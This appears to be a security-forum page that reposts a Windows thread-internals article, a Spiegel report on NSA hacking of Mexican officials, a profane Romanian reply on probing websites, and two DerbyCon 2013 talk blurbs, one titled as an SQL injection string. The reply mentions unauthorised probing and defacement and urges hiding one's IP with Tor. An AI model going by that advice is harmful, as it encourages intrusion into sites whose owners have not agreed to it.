Internals of Windows Thread By Mahesh Bailwal, 21 Oct 2013 Introduction In today’s programming world multi-threading has become imperative part of any programming language whether its .NET, Java or C++. To write highly responsive and scalable application it must avail the power of multi threading programming. While working on .Net Framework I came across various Framework Class Libraries (FCL) for parallel task processing like Task Parallel Library (TPL), Parallel LINQ (PLINQ), Task Factories, Thread Pool, Asynchronous programming modal, etc, all of which behind the scene use power of Windows threads to achieve parallelism. Understanding the basic structure of Windows thread will always help implementing and understanding these advance features like TPL, PLINQ, etc in a better way and help you in visualizing how multiple threads works in a system together, specially when you are trouble shooting multithread application . In this article I would like to share some of basics about Windows thread which may help you in understanding how operating system implements threads. What Windows Thread Consist Of Let’s start with looking at basic components of a thread. There are three basic components of Windows thread :- Thread Kernel Object Stack TEB Windows Thread Components All of these three components all together create Windows thread. I tried to explain all them one by one below but before looking into these three components lets have brief introduction about Windows kernel and kernel objects as these are most important part of Windows operating system. What Is Operating System Kernel Kernel is the main component of any operating system. It is a bridge between applications and hardware. Kernel provides layer of abstraction through which application can interact with hardware. Kernel is the part of the operating system that loads first, and it remains in physical memory. The kernel's primary function is to manage the computer's hardware and resources and allow other programs to run and use these resources. To know more about kernel visit below link. http://en.wikipedia.org/wiki/Kernel_(computing) What Are Kernel Objects Kernel needs to maintain lots of data about numerous resources such as processes, threads, files, etc, for that kernel use “kernel data structures” which are known as kernel objects. Each kernel object is simply a memory block allocated by the kernel and is accessible only to the kernel. This memory block is a data structure whose members maintain information about the object. Some members (security descriptor, usage count, and so on) are the same across all object types, but most data members are specific to the type of kernel object.Kernel creates and manipulates several types of kernel objects, such as process objects, thread objects, event objects, file objects, file-mapping objects, I/O completion port objects, job objects, mutex objects, pipe objects, semaphore objects etc Winobj Screenshot If you are curious to see the list of all the kernel object types then you can use free WinObj tool from Sysinternals located at below mentioned link WinObj Thread Kernel Object First and very basic component of Windows thread is thread kernel object. For every thread in system operating system create one thread kernel object. Operating system use thread kernel objects for managing and executing threads across the system. The kernel object is also where the system keeps statistical information about the thread. Below are some of the important properties of thread kernel object. Thread Context Each thread kernel object contains set of CPU registers, called the thread's context. The context reflects the state of the thread's CPU registers when the thread last executed. The set of CPU registers for the thread is saved in a CONTEXT structure. The instruction pointer and stack pointer registers are the two most important registers in the threads context. A stack pointer is a register that stores the starting memory address of the stack frame of the current function executing inside the thread. Instruction pointer points to the current instruction that need to be executed by the CPU. Operating system use kernel object context information while performing thread context switching. Context switch is the process of storing and restoring the state (context) of a thread so that execution can be resumed from the same point at a later time. Below mentioned table display some of other important information held in thread kernel object about the thread. [TABLE=class: ArticleTable] [TR] [TD]Property Name[/TD] [TD]Description[/TD] [/TR] [TR] [TD]CreateTime[/TD] [TD]This field contains the time when the Thread was created.[/TD] [/TR] [TR] [TD]ThreadsProcess[/TD] [TD]This field contains a pointer to the EPROCESS Structure of the Process that owns this Thread.[/TD] [/TR] [TR] [TD]StackBase[/TD] [TD]This field contains the Base Address of this Thread’s Stack.[/TD] [/TR] [TR] [TD]StackLimit[/TD] [TD]This field contains the end of the Kernel-Mode Stack of the Thread.[/TD] [/TR] [TR] [TD]TEB[/TD] [TD]This field contains a pointer to the Thread’s Environment Block.[/TD] [/TR] [TR] [TD]State[/TD] [TD]This field contains the Thread’s current state.[/TD] [/TR] [TR] [TD]Priority[/TD] [TD]This field contains the Thread’s current priority.[/TD] [/TR] [TR] [TD]ContextSwitches[/TD] [TD]This field counts the number of Context Switches that the Thread has gone through (switching Contexts/Threads).[/TD] [/TR] [TR] [TD]WaitTime[/TD] [TD]This field contains the time until a Wait will expire.[/TD] [/TR] [TR] [TD]Queue[/TD] [TD]This field contains a Queue for this Thread.[/TD] [/TR] [TR] [TD]Preempted[/TD] [TD]This field specifies if the Thread will be preempted or not.[/TD] [/TR] [TR] [TD]Affinity[/TD] [TD]This field contains the Thread’s Kernel Affinity.[/TD] [/TR] [TR] [TD]KernelTime[/TD] [TD]This field contains the time that the Thread has spent in Kernel Mode.[/TD] [/TR] [TR] [TD]UserTime[/TD] [TD]This field contains the time that the Thread has spent in User Mode.[/TD] [/TR] [TR] [TD]ImpersonationInfo[/TD] [TD]This field contains a pointer to a structure used when the Thread is impersonating another one.[/TD] [/TR] [TR] [TD]SuspendCount[/TD] [TD]This field contains a count on how many times the Thread has been suspended.[/TD] [/TR] [/TABLE] Stack The second basic component of a thread is stack. Once the thread kernel object has been created, the system allocates memory, which is used for the thread's stack. Every thread got its own stack which is used for maintaining local variables of functions and for passing arguments to functions executing inside a thread. When a function executes, it may add some of its state data to the top of the stack like arguments and local variables, when the function exits it is responsible for removing that data from the stack. Apart from that a thread's stack is used to store the location of function calls in order to allow return statements to return to the correct location. Operating system allocates two types of stack for every thread, one is user-mode stack and other is kernel-mode stack. User-mode stack The user-mode stack is used for local variables and arguments passed to methods. It also contains the address indicating what the thread should execute next when the current method returns. By default, Windows allocates 1 MB of memory for each thread’s user-mode stack Kernel-mode stack The kernel-mode stack is used when application code passes arguments to a kernel function in the operating system. For security reasons, Windows copies any arguments passed from user-mode code to the kernel from the thread’s user-mode stack to the thread’s kernel-mode stack. Once copied, the kernel can verify the arguments’ values, and since the application code can’t access the kernel mode stack, the application can’t modify the arguments’ values after they have been validated and the OS kernel code begins to operate on them. In addition, the kernel calls methods within itself and uses the kernel-mode stack to pass its own arguments, to store a function’s local variables, and to store return addresses. The kernel-mode stack is 12 KB when running on a 32-bit Windows system and 24 KB when running on a 64-bit Windows system. You can learn more about thread stack at following links Kernel Space Definition Stack-based memory allocation - Wikipedia, the free encyclopedia Call stack - Wikipedia, the free encyclopedia Thread environment Block (TEB) Another important data structure used by every thread is Thread environment Block (TEB). TEB is a block of memory allocated and initialized in user mode (address space that application code can access directly). The TEB consumes 1 page of memory (4 KB on x86 and x64 CPUs). On of the important information TEB contains is information about exception handling which is used by SEH (Microsoft Structured Exception Handling). The TEB contains the head of the thread’s exception-handling chain. Each try block that the thread enters inserts a node in the head of this chain.The node is removed from the chain when the thread exit the try block. You can learn more about SEH at below link. A Crash Course on theDepths of Win32 Structured Exception Handling, MSJ January 1997 In addition, TEB contains the thread-local storage data. In multi-threaded applications, there often arises the need to maintain data that is unique to a thread. The place where this thread specific data get stored called thread-local storage. You can learn more about thread-local storage at below link. http://msdn.microsoft.com/en-us/library/windows/desktop/ms686749(v=vs.85).aspx Below mentioned table display few important properties of TEB [TABLE=class: ArticleTable] [TR] [TD]Property Name[/TD] [TD]Description[/TD] [/TR] [TR] [TD]ThreadLocalStorage[/TD] [TD]This field contains the thread specific data.[/TD] [/TR] [TR] [TD]ExceptionList[/TD] [TD]This field contains the Exception Handlers List used by SEH[/TD] [/TR] [TR] [TD]ExceptionCode[/TD] [TD]This field contains the last exception code generated by the Thread.[/TD] [/TR] [TR] [TD]LastErrorValue[/TD] [TD]This field contains the last DLL Error Value for the Thread.[/TD] [/TR] [TR] [TD]CountOwnedCriticalSections[/TD] [TD]This field counts the number of Critical Sections (a Synchronization mechanism) that the Thread owns.[/TD] [/TR] [TR] [TD]IsImpersonating[/TD] [TD]This field is a flag on whether the Thread is doing any impersonation.[/TD] [/TR] [TR] [TD]ImpersonationLocale[/TD] [TD]This field contains the locale ID that the Thread is impersonating.[/TD] [/TR] [/TABLE] Thread kernel object as thread handle System keeps all information required for thread execution/ scheduling inside thread kernel object. Apart from that operating system store address of thread stack and thread TEB in thread kernel object as shown in below figure. Thread kernel object mapping Thread kernel object is the only handle through which operating system access all the information about the thread and is use it for thread execution/ scheduling Thread State Each thread exists in a particular execution state at any given time. Operating system store the state of thread inside thread kernel object field "state". Operating system uses these states that are relevant to performance; these are: - Running - thread is using CPU - Blocked - thread is waiting for input - Ready - thread is ready to run (not Blocked or Running) - Exited - thread has exited but not been destroyed Thread State Diagram Thread Scheduler Queues Operating system thread scheduler maintains thread kernel objects in different queues based on the state of a thread Ready queue - Scheduler maintains list containing threads in Ready state and can be scheduled on CPU. Often list is sorted, generally one queue per CPU. Waiting queues - A thread in Blocked state is put in a wait queue. Below are few example which cause thread block. - Thread kernel object might have a suspend count greater than 0. This means that the thread is suspended - Thread is waiting on some lock to get release - Thread is waiting for reply from E.g., disk, console,network, etc. [*] Exited queue - A thread in Exited state is put in this queue - Thread scheduler use doubly linked list data structure for maintaining these queues where in a list head points to a collection of list elements or entries and each item points to the next and previous items in the list. Thread kernel object doubly link list Scheduler moves threads across queues on thread state change - E.g., thread moves from a wait queue to ready queue on wake up. How OS Run Threads As we already know that thread context structure is maintained inside the thread's kernel object. This context structure reflects the state of the thread's CPU registers when the thread was last executing. Every 20 milliseconds or so, operating system thread scheduler looks at all the thread kernel objects currently inside Ready Queue (doubly linked list). Thread scheduler selects one of the thread kernel objects and loads the CPU's registers with the values that were last saved in the thread's context. This action is called a context switch. At this point, the thread is executing code and manipulating data in its process' address space. After another 20 milliseconds or so, scheduler saves the CPU's registers back into the thread's context. The scheduler again examines the remaining thread kernel objects in Ready Queue, selects another thread's kernel object, loads this thread's context into the CPU's registers, and continues. Thread Scheduler Diagram This operation of loading a thread's context, letting the thread run, saving the context, and repeating the operation begins when the system boots and continues until the system is shut down. Processes and Threads One more thing I would like to share is the relationship between thread and process. Every process requires at least one thread. A process never executes anything, it is simply a container for threads. Threads are always created in the context of some process and live their entire life within that process. What this really means is that the thread executes code and manipulates data within its process' address space. So if you have two or more threads running in the context of a single process, the threads share a single address space. The threads can execute the same code and manipulate the same data. Process gives structural information to the in-memory copy of your executable program, such as which memory is currently allocated, which program is running, how much memory it is using, etc. The Process however, does not execute any code on its own. It simply allows the OS (and the user) to know to which executable program a certain Thread belongs to. It also contains all the handles and security rights and privileges that threads create. Therefore, code actually runs in Threads. For understanding you can make analogy for processes and threads using a regular, everyday object -- a house. A house is really a container, with certain attributes (such as the amount of floor space, the number of bedrooms, and so on). If you look at it that way, the house really doesn't actively do anything on its own -- it's a passive object. This is effectively what a process is. The people living in the house are the active objects -- they're the ones using the various rooms, watching TV, cooking, taking showers, and so on. We'll soon see that's how threads behave. Just as a house occupies an area of real estate, a process occupies memory. And just as a house's occupants are free to go into any room they want, a processes' threads all have common access to that memory. A process, just like a house, has some well-defined "borders." A person in a house has a pretty good idea when they're in the house, and when they're not. A thread has a very good idea -- if it's accessing memory within the process, it can live. If it steps out of the bounds of the process's address space, it gets killed. This means that two threads, running in different processes, are effectively isolated from each other. If you want to learn more about process and thread. Please visit this link Processes and Threads Summary In this article I tried to share basic information about how Windows manage threads best to my knowledge. Please feel free to share your comments if you want me to add something or anything which needs improvement or clarification. Reference CLR via C#, Third Edition (February 10, 2010) By Jeffrey Richter Windows via C/C++ Fifth Edition (December 2007) by Jeffrey Richter and Christophe Nasarre Introduction to NT Internals - Alex Ionescu's Blog Processes and Threads License This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) About the Author Mahesh Bailwal Software Developer (Senior) India Sursa: Internals of Windows Thread - CodeProject

[h=2]NSA Accessed Mexican President's Email[/h] By Jens Glüsing, Laura Poitras, Marcel Rosenbach and Holger Stark The NSA has been systematically eavesdropping on the Mexican government for years. It hacked into the president's public email account and gained deep insight into policymaking and the political system. The news is likely to hurt ties between the US and Mexico. The National Security Agency (NSA) has a division for particularly difficult missions. Called "Tailored Access Operations" (TAO), this department devises special methods for special targets. That category includes surveillance of neighboring Mexico, and in May 2010, the division reported its mission accomplished. A report classified as "top secret" said: "TAO successfully exploited a key mail server in the Mexican Presidencia domain within the Mexican Presidential network to gain first-ever access to President Felipe Calderon's public email account." According to the NSA, this email domain was also used by cabinet members, and contained "diplomatic, economic and leadership communications which continue to provide insight into Mexico's political system and internal stability." The president's office, the NSA reported, was now "a lucrative source." This operation, dubbed "Flatliquid," is described in a document leaked by whistleblower Edward Snowden, which SPIEGEL has now had the opportunity to analyze. The case is likely to cause further strain on relations between Mexico and the United States, which have been tense since Brazilian television network TV Globo revealed in September that the NSA monitored then-presidential candidate Enrique Peña Nieto and others around him in the summer of 2012. Peña Nieto, now Mexico's president, summoned the US ambassador in the wake of that news, but confined his reaction to demanding an investigation into the matter. Now, though, the revelation that the NSA has systematically infiltrated an entire computer network is likely to trigger deeper controversy, especially since the NSA's snooping took place during the term of Peña Nieto's predecessor Felipe Calderón, a leader who worked more closely with Washington than any other Mexican president before him. Brazil Also Targeted Reports of US surveillance operations have caused outrage in Latin America in recent months. Brazilian President Dilma Rousseff cancelled a planned trip to Washington five weeks ago and condemned the NSA's espionage in a blistering speech to the United Nations General Assembly. The US surveillance of politicians in Mexico and Brazil is not a one-off. Internal documents show these countries' leaders represent important monitoring targets for the NSA, with both Mexico and Brazil ranking among the nations high on an April 2013 list that enumerates the US' surveillance priorities. That list, classified as "secret," was authorized by the White House and "presidentially approved," according to internal NSA documents. The list ranks strategic objectives for all US intelligence services using a scale from "1" for high priority to "5" for low priority. In the case of Mexico, the US is interested primarily in the drug trade (priority level 1) and the country's leadership (level 3). Other areas flagged for surveillance include Mexico's economic stability, military capabilities, human rights and international trade relations (all ranked at level 3), as well as counterespionage (level 4). It's much the same with Brazil -- ascertaining the intentions of that country's leadership ranks among the stated espionage targets. Brazil's nuclear program is high on the list as well. When Brazilian President Rousseff took office in early 2011, one of her goals was to improve relations with Washington, which had cooled under her predecessor, the popular former labor leader Luiz Inácio Lula da Silva. Lula focused primarily on establishing closer ties with China, India and African nations, and even invited Iran's then-President Mahmoud Ahmadinejad to Brazil, in a snub to the US. President Barack Obama postponed a planned visit to the capital, Brasília, as a result. Rousseff, however, has distanced herself from Iran. And the first foreign minister to serve under her, Antonio Patriota, who recently resigned, was seen as friendly toward the US, maintaining good ties with his counterpart Hillary Clinton. Obama made a state visit to Brazil two years ago and Rousseff had planned to reciprocate with a visit to Washington this October. Then came the revelation that US authorities didn't stop short of spying on the president herself. According to one internal NSA presentation, the agency investigated "the communication methods and associated selectors of Brazilian President Dilma Rouseff and her key advisers." It also said it found potential "high-value targets" among her inner circle. Economic Motives? Rousseff believes Washington's reasons for employing such unfriendly methods are partly economic, an accusation that the NSA and its director, General Keith Alexander, have denied. Yet according to the leaked NSA documents, the US also monitored email and telephone communications at Petrobras, the oil corporation in which the Brazilian government holds a majority stake. Brazil possesses enormous offshore oil reserves. Just how intensively the US spies on its neighbors can be seen in another, previously unknown operation in Mexico, dubbed "Whitetamale" by the NSA. In August 2009, according to internal documents, the agency gained access to the emails of various high-ranking officials in Mexico's Public Security Secretariat that combats the drug trade and human trafficking. This hacking operation allowed the NSA not only to obtain information on several drug cartels, but also to gain access to "diplomatic talking-points." In the space of a single year, according to the internal documents, this operation produced 260 classified reports that allowed US politicians to conduct successful talks on political issues and to plan international investments. The tone of the document that lists the NSA's "tremendous success" in monitoring Mexican targets shows how aggressively the US intelligence agency monitors its southern neighbor. "These TAO accesses into several Mexican government agencies are just the beginning -- we intend to go much further against this important target," the document reads. It goes on to state that the divisions responsible for this surveillance are "poised for future successes." While these operations were overseen from the NSA's branch in San Antonio, Texas, secret listening stations in the US Embassies in Mexico City and Brasília also played a key role. The program, known as the "Special Collection Service," is conducted in cooperation with the CIA. The teams have at their disposal a wide array of methods and high-tech equipment that allow them to intercept all forms of electronic communication. The NSA conducts its surveillance of telephone conversations and text messages transmitted through Mexico's cell phone network under the internal code name "Eveningeasel." In Brasília, the agency also operates one of its most important operational bases for monitoring satellite communications. This summer, the NSA took its activities to new heights as elections took place in Mexico. Despite having access to the presidential computer network, the US knew little about Enrique Peña Nieto, designated successor to Felipe Calderón. Spying on Peña Nieto In his campaign appearances, Peña Nieto would make his way to the podium through a sea of supporters, ascending to the stage like a rock star. He is married to an actress, and also had the support of several influential elder statesmen within his party, the PRI. He promised to reform the party and fight pervasive corruption in the country. But those familiar with the PRI, which is itself regarded by many as corrupt, saw this pledge as little more than a maneuver made for show. First and foremost, though, Peña Nieto promised voters he would change Mexico's strategy in the war on drugs, announcing he would withdraw the military from the fight against the drug cartels as soon as possible and invest more money in social programs instead. Yet at the same time, he assured Washington there would be no U-turn in Mexico's strategy regarding the cartels. So what were Peña Nieto's true thoughts at the time? What were his advisers telling him? The NSA's intelligence agents in Texas must have been asking themselves such questions when they authorized an unusual type of operation known as structural surveillance. For two weeks in the early summer of 2012, the NSA unit responsible for monitoring the Mexican government analyzed data that included the cell phone communications of Peña Nieto and "nine of his close associates," as an internal presentation from June 2012 shows. Analysts used software to connect this data into a network, shown in a graphic that resembles a swarm of bees. The software then filtered out Peña Nieto's most relevant contacts and entered them into a databank called "DishFire." From then on, these individuals' cell phones were singled out for surveillance. According to the internal documents, this led to the agency intercepting 85,489 text messages, some sent by Peña Nieto himself and some by his associates. This technology "might find a needle in a haystack," the analysts noted, adding that it could do so "in a repeatable and efficient way." It seems, though, that the NSA's agents are no longer quite as comfortable expressing such pride in their work. Asked for a comment by SPIEGEL, the agency replied: "We are not going to comment publicly on every specific alleged intelligence activity, and as a matter of policy we have made clear that the United States gathers foreign intelligence of the type gathered by all nations. As the President said in his speech at the UN General Assembly, we've begun to review the way that we gather intelligence, so that we properly balance the legitimate security concerns of our citizens and allies with the privacy concerns that all people share." Meanwhile, the NSA's spying has already caused considerable political damage in the case of Brazil, seriously denting the mutual trust between Rousseff and Obama. Brazil now plans to introduce a law that will force companies such as Google and Facebook to store their data inside Brazil's borders, rather than on servers in the US, making these international companies subject to Brazilian data privacy laws. The Brazilian government is also developing a new encryption system to protect its own data against hacking. So far, Mexico has reacted more moderately -- although the fact that the NSA infiltrated even the presidential computer network wasn't known until now. Commenting after TV Globo first revealed the NSA's surveillance of text messages, Peña Nieto stated that Obama had promised him to investigate the accusations and to punish those responsible, if it was found that misdeeds had taken place. In response to an inquiry from SPIEGEL concerning the latest revelations, Mexico's Foreign Ministry replied with an email condemning any form of espionage on Mexican citizens, saying such surveillance violates international law. "That is all the government has to say on the matter," stated a spokesperson for Peña Nieto. Presumably, that email could be read at the NSA's Texas location at the same time. Sursa: NSA Hacked Email Account of Mexican President - SPIEGEL ONLINE

De ce cauti vulnerabilitati in acele site-uri? Te plictisesti? Nu e un motiv valid. Practic, nu cauti probleme in "orice"' site, cauti in anumite site-uri. Daca nu conteaza in ce site gasesti ceva, fie ca e XSS, SQLI sau orice altceva, inseamna ca esti gay. Gasesti probleme in urmatoarele cazuri: 1. Intr-un site cu Bug Bounty aka ca sa faci bani 2. Cand posestorii site-urilor iti ofera permisiunea (in scris) de a face acest lucru 3. Intr-un site unde crezi ca ai gasii chestii interesante si in cazu asta iti ti-i gura si nu postezi nici pe RST si nici nu le dai mail 4. Intr-un site pe care ai boala, de exemplu sa iti bati pula de Mircea Badea aka deface cu "Muie" scris cu font 72. 5. Ca sa te dai smecher ca esti smecher ca ce smecher esti ca ai gasit SQLI intr-un site pe care poate l-a facut Gigel care a invatat si el putin PHP, si sa le dai link prietenilor ca sa le demonstrezi teorema aceasta Ca te plictisesti sau ca vrei sa inveti nu sunt motive valide, iar singurele cazuri acceptate sunt primele 2, la celelalte risti sa ai probleme. Daca vrei sa faci fapte bune, sa stii ca nu se merita. Daca chiar vrei sa fie ok, trimite un mail INAINTE, zi-le ca esti pasionat pula-n-pizda si ca vrei sa vezi daca sunt probleme si ca le raportezi. Daca accepta, o faci. Daca nu accepta, nu o faci. Si totusi, oricare ar fi cazurile de mai sus, iti sugerez sa folosesti "Tor" sau orice altceva pentru a-ti ascunde IP-ul, sa nu le raportezi problemele de pe gigel.gheorghe@gmail.com unde acela e numele tau si nici sa nu postezi pe undeva de pe vreun username dupa care ti-ai dat datele publice. Asta in general, daca e un site micut nu o sa ii pese nimanui. Povestea e mai lunga, o sa intelegi tu cu timpul, de preferat fara sa treci prin probleme pentru asta.

Derbycon 2013 - ‘) Union Select `This_Talk` As (‘New Exploitation And Obfuscation Techniques’)%00 - Roberto Salgado Description: “This talk will present some of the newest and most advanced optimization and obfuscation techniques available in the field of SQL Injections. These techniques can be used to bypass web application firewalls and intrusion detection systems at an alarming speed. This talk will also demonstrate these techniques on both open-source and commercial firewalls and present the ALPHA version of a framework called Leapfrog which Roberto is developing; Leapfrog is designed to assist security professionals, IT administrators, firewall vendors and companies in testing their firewall rules and implementation to determine if they are an adequate enough defense measure to stop a real cyber-attack. Many of the techniques that will be presented were created by Roberto Salgado and are currently some of the fastest methods of extracting information from a database through SQL Injections. Roberto will demonstrate how to reduce the amount of time it takes to exploit a SQL Injection by over a third of the time it would normally take. He will also demonstrate why firewalls and intrusion detection systems are not the ultimate solution to security and why other measurements should also be implemented.” Bio: “As an Information Security specialist, Roberto has always been passionate about his line of work and has had several years of experience researching and experimenting in this field. In saying this, Roberto’s expertise is brought forth by his continuing commitment to exploring the cutting edge of today’s security challenges, and finding solutions to these security problems. This driving passion has given him the opportunity to participate and contribute to great projects such as Modsecurity, PHPIDS, SQLMap and the Web Application Obfuscation book. He also created and maintains the SQL Injection Knowledge Base, an invaluable resource for penetration testers when dealing with SQL Injections. In his free time Roberto enjoys creating SQL Injection challenges for both the security community and himself to learn from. Additionally, Roberto enjoys programming in Python and has created projects like Panoptic, a penetration testing tool that automates the search and retrieval of common log and config files through LFI vulnerabilities.” For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - ‘) Union Select `This_Talk` As (‘New Exploitation And Obfuscation Techniques’)%00 - Roberto Salgado

Derbycon 2013 - Ios.Reverse #=? Ipwn Apps - Mano ‘Dash4rk’ Paul Description: While iOS apps downloaded from the AppStore are packaged in binary format and usually encrypted, there is a lot of information one can glean by reversing engineering iOS apps. This talk with cover reversing tools and techniques that can be used to reverse iOS apps to make them iPwn Apps. Bio:Christian, Author (7 Qualities of Highly Secure Software and The Official Guide to the CSSLP), Advisor (Software Assurance), Biologist (Shark Researcher), Entrepreneur (SecuRisk Solutions), Founder (HackFormers), Security Professional and Shaolin Do Kung Fu student (Black belt)! Formal: Mano ‘dash4rk’ Paul is a shark biologist turned security professional. He is the author of the acclaimed “7 Qualities of Highly Secure Software” and the “Official (ISC)2 Guide to the CSSLP.” He serves as the CEO of SecuRisk Solutions which he founded after managing the AppSec program at Dell and his InfoSec experience includes designing & developing security programs from compliance-to-coding, security in the SDLC, writing secure code, risk management, security strategy, and security awareness training & education. He also founded HackFormers which is a Christian organization with the mission to Teach Security, Teach Christ and Teach Security in Christ. He is an invited speaker/panelist, delivering talks and keynotes in conferences such as RSA, OWASP AppSec, SANS, Security Congress, ASIS and Gartner Catalyst. Mr. Paul also serves as the software assurance advisor for (ISC)2 and is a member of the AppSec Advisory Board. For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Ios.Reverse #=&Gt; Ipwn Apps - Mano ‘Dash4rk’ Paul